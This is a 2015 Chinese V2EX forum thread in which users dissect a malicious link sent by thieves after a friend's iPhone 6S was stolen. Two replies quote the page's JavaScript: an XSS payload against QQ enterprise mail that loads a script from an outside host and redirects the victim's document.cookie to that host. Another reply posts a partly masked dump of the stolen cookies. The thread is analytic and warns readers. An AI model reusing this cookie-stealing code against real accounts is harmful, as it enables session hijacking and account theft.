V2EX 首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
V2EX  ›  问与答

朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID

  •  1
     
  •   saxon · 2015-11-02 13:32:21 +08:00 · 4656 次点击
    这是一个创建于 599 天前的主题,其中的信息可能已经有所发展或是发生改变。

    http://eeee.washbowl.com.cn/
    这个是个挂马地址,请各位大师分析一下
    如果我点开 除了 QQ 邮箱的 Cookie 小偷还能获得什么?

    第 1 条附言  ·  2015-11-02 18:07:59 +08:00
    有什么信息可以追踪到写这个 scirpt 的人么...这个网站的主机和 DNS 是?
    第 2 条附言  ·  2015-11-03 14:01:20 +08:00
    提醒:不要用 IPHONE 打开浏览器链接!!!!!!!!
    38 回复  |  直到 2016-07-08 21:18:26 +08:00
        1
    paradoxs   2015-11-02 13:35:24 +08:00 via iPhone
        2
    jedyu   2015-11-02 13:42:28 +08:00
    手贱点了进去,一堆信息被上传了
        3
    ScotGu   2015-11-02 13:44:08 +08:00
    @jedyu 感谢你去趟雷~~ 我就不点了。
        4
    saxon   2015-11-02 13:44:13 +08:00
    @jedyu 我正在分析=-= 有一段 js 应该是用 cookie 去登 QQ 企业邮箱
        5
    jedyu   2015-11-02 13:51:29 +08:00
    @ScotGu
    @saxon
    是的,企业邮箱、个人邮箱、 QQ 号码及一堆 Cookie 都被传上去了。

    扫了一下注入点,然后发现服务器挂了
        6
    saxon   2015-11-02 13:53:07 +08:00
    @jedyu 能获得一些额外的信息么
        7
    WenJimmy   2015-11-02 13:53:58 +08:00
    不敢点
        8
    jedyu   2015-11-02 14:00:32 +08:00
    @saxon

    c=wxstaytime=1423741712;
    idqq_account=theCanChange=1;
    theShowUin=145xxxxxx;
    BindedEmail=maxxxxxx@gmail.com;
    EmailCanSeach=1;
    EmailIsActive=1;
    UinCanSeach=1;
    shouldshowmail=1;
    firstsetidqq=1;
    MSK=0;;
    verifysession=h019bd3fd70a412c5e236282065369308f17xxxxxxbc0abc5294375bf583f5axxxxxxaf4f28ba;
    qz_gdt=m6uqgvwxxxxxxq4ezk4ka;
    qqmusic_uin=;
    qqmusic_key=;
    qqmusic_fromtag=;
    new_mail_num=14xxxxxx8&1;
    qm_flag=0;
    qqmail_alias=xxxxxx@biz.mail.qq.com;
    sid=1407607908&exxxxxx115757efa325bc9b271,cvEGXXdNb8dQ.|-1683484644&354xxxxxx6cdfc76ddafdeb,cDA0IfXXXq4mY.;
    biz_username=261xxxxxx;
    CCSHOW=0000;
    username=140761208&1403227908|-16342184644&261233652;
    ssl_edition=b31.exmail.qq.com;
    Hm_lvt_bdfb0d7xxxxxx0c5a5a2475c291ac7aca2=14xxxxxx;
    Hm_lpvt_bdfb0d72xxxxxx5a5a2475c291ac7aca2=14xxxxxx;
    _ga=GA1.3.1469923463.1445309872;
    qm_username=14xxxxxx;
    qm_sid=3240209253e03xxxxxx90db7a6,qSnpxxxxxxHVOR255bUx1by1rSWxxxxxxeFJna18.;
    RK=CEeuCexxGR;
    pt_clientip=133b3c0cxxxxxx4f;
    pt_serverip=b7ff0abfxxxxxx60;
    pt2gguin=o0014xxxxxx;
    uin=o0014xxxxxx;
    skey=@uF8W0XXXc;
    ptisp=cnc;
    ptcz=dccb14fd40d2xxxxxx43834eabd88d4d5a73c12561f4be2350fcxxxxxxa985;
    pgv_info=ssid=s776441213&pgvReferrer=;
    pgv_pvid=775212126;
    o_cookie=14xxxxxx;
    uid=12xxxxxx;
    dc_vplaying=0;
    tinfo=14xxxxxx.0000*;
    wimrefreshrun=0&;
    autologin=n

    &u=lockKey8&r=http://eeee.washbowl.com.cn/htmlpage5.html
        9
    jedyu   2015-11-02 14:11:20 +08:00
    @jedyu 然后,我的 IP 好像也被 ban 了
        10
    kikyous   2015-11-02 14:13:52 +08:00
    <script>
    function test(PARAMS) {
    var temp = document.createElement("form");
    temp.acceptCharset = "utf-8";
    //By Wfox
    temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
    var opt = document.createElement("textarea");
    opt.name = x;
    opt.value = PARAMS[x];
    temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    }
    test({
    uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
    });
    </script>
    谁来讲解一下, qq.com 的 cookie 不是被 post 到腾讯的服务器了吗?他们是怎么得到的?
        11
    laydown   2015-11-02 14:27:02 +08:00
    我没看正文直接点了,我要不要重装系统啊?!!!
        12
    soolby   2015-11-02 14:28:17 +08:00
    定期改一下密码复杂一点。
    把你的提示问题的答案设置的复杂一点(记得备份)
        13
    aliuwr   2015-11-02 14:28:55 +08:00
    估计就是这个 http://www.wooyun.org/bugs/wooyun-2015-0144918
    10-08 就确认了,还没修复。不知道是不好修复,还是不够重视。 rank 也只给 1 ,真没意思。

    @laydown 速度改 QQ 密码就好了。
        14
    laydown   2015-11-02 14:30:19 +08:00
    @aliuwr Mac 系统,也没装 QQ ,应该没事吧?
        15
    squid157   2015-11-02 14:33:19 +08:00 via iPhone
    @laydown 看前面回复 似乎是偷 cookie 这就不好说了
        16
    skyun   2015-11-02 14:45:13 +08:00
    手贱。直接点进去了。。。
        17
    wgf2008   2015-11-02 14:46:55 +08:00
    D 它
        18
    ScotGu   2015-11-02 14:48:47 +08:00
    既然这个网站可以直接获取 cookies
    那么每天上网百度出的一堆垃圾站也可能用这招,只是没有这个有针对性。
    看来用邮件客户端很有必要啊。
        19
    Tuibimba   2015-11-02 14:55:37 +08:00 via Android
    我的 iphone 被偷了后也收到过这类链接
    点进去后发现不对劲 立马把相关密码都改了
        20
    BOYPT   2015-11-02 14:57:26 +08:00


    在匿名模式打开看了下,自动去刷一大堆常见网站,看来有漏用户信息漏洞的公共网站不少啊
        21
    wdlth   2015-11-02 14:57:47 +08:00   ♥ 1
    用的阿里云……
        22
    wohenyingyu01   2015-11-02 15:00:18 +08:00
    网址点进去后发现是个新闻网站。。。
        23
    Evi1m0   2015-11-02 15:17:27 +08:00
    @BOYPT

    两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。

    另外一个 iframe 是进行攻击者的操作:

    <iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>

    <iframe src="/htmlpage5.html" style="display:none"></iframe>

    ---------------

    function test(PARAMS) {
    var temp = document.createElement("form");
    temp.acceptCharset = "utf-8";
    //By Wfox
    temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
    var opt = document.createElement("textarea");
    opt.name = x;
    opt.value = PARAMS[x];
    temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    }
    test({
    uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
    });


    document.domain="qq.com";
    window.onload=documentrrady;
    function documentrrady(){
    window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
    };
        24
    BOYPT   2015-11-02 15:24:43 +08:00
    比较好奇的是,往 qq 的 login post 一下,然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了??
        25
    skyun   2015-11-02 15:44:14 +08:00
    吓得我赶紧改了 QQ 密码,清空了浏览器 cookie ,往常用网站上重新登陆了次,刷新了 cookie 。。。这样就没事了吧?
        26
    Sleebi   2015-11-02 15:47:36 +08:00
    这次还好忍住了,先看评论,保命
        27
    Evi1m0   2015-11-02 15:58:08 +08:00
    嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
        28
    Smirnoff   2015-11-02 16:06:59 +08:00
    @Evi1m0 蘑菇君?
        29
    yksoft1   2015-11-02 17:24:25 +08:00
    用虚拟机开,发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事
        30
    ChoateYao   2015-11-02 17:35:11 +08:00
    难道我去慢了,打开只有一个 IIS 的图标什么事情都没有发生。
        31
    saxon   2015-11-02 18:08:50 +08:00
    @skyun 个人认为密码还是窃取不到的..
        32
    saxon   2015-11-02 18:14:55 +08:00
    @wohenyingyu01 并不是 只是挂了一个 iframe
        33
    RHFS   2015-11-02 18:52:41 +08:00
    你还是提醒一下别人别乱点链接吧。。。
    我觉得很多人点玩看了评论都吓到了
        34
    curiosity   2015-11-02 19:39:18 +08:00
    我擦...点开了...有什么补救方法嘛!
        35
    Evi1m0   2015-11-02 19:47:04 +08:00   ♥ 1
        36
    saxon   2015-11-03 14:01:38 +08:00
    @RHFS 提醒了
        37
    saxon   2015-11-03 14:02:10 +08:00
    @curiosity 如果担心,可以改个 QQ 密码就行了
        38
    DevineRapier   350 天前
    @kikyous web 第一课: cookie 在本地, session 在服务器
    DigitalOcean
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   鸣谢   ·   1479 人在线   最高记录 2607   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.7.5 · 73ms · UTC 05:18 · PVG 13:18 · LAX 22:18 · JFK 01:18
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1